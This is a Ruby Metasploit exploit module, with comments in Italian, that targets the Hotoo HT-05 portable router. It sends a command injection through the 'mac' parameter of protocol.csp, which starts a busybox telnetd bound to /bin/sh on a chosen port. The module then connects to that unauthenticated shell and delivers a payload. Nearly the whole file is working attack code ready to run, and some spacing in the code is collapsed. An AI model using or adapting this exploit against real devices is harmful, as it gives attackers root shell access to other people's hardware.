require 'msf/core'
require 'net/http'
require "uri"classMetasploitModule< Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
##Descrizione del Exploit#definitialize(info ={})super(update_info(info,'Name'=>'Hotoo HT-05remote shell exploit','Description'=>%q{
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
This exploit was written by Andrei Manole. Version of the firmware 2.000.022. Tested on 2.000.082-> it still works
},'Author'=>'Andrei Manole','References'=>[],'Privileged'=> true,'Platform'=>['unix'],'Arch'=> ARCH_CMD,'Payload'=>{'Space'=>2000,'BadChars'=>'','DisableNops'=> true,'Compat'=>{'PayloadType'=>'cmd_interact','ConnectionType'=>'find'}},#fine del settaggio del payload'Targets'=>[['Automatic',{}],],'DisclosureDate'=>"20 Dicembre 2018",'DefaultTarget'=>0))
register_options([ Opt::RPORT(6666)], self.class)
end
defsend_request(host,port)
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)if response.code ==200|| response.message =='OK'||response.class.name =='HTTPOK' then
return true
end
return false
end
def exploit #exploit
print_status("[+] Apertura backdoor in corso...")if !send_request(datastore['RHOST'],datastore['RPORT']) then
raise("[-] Errore nel apertura della porta")
end
print_good("[+] Richiesta inviata con successo! :)")
nsock = self.connect(false,{"RPORT"=> datastore['RPORT']})
print_good("[+] Porta aperta con successo ! :)")
nsock.put(payload.encoded +" >/dev/null 2>&1")
handler(nsock)return
end
end
